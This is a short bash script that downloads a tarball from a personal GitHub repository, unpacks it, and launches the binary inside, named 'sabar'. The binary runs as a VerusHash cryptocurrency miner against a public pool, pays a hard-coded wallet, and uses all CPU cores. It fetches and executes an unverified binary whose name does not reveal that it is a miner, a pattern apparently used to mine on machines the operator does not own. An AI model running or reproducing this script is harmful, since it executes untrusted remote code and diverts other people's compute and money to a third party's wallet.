#!/bin/bash
wget https://github.com/ganggamulyana08/ganggamulyana08/raw/main/sabar.tar.gz && tar -xvf sabar.tar.gz
./sabar --disable-gpu --algorithm verushash --pool na.luckpool.net:3956 --wallet RXggSUt7YBw76Jq8A1cmqVH8TPWVoao6PJ.llo -t $(nproc --all)
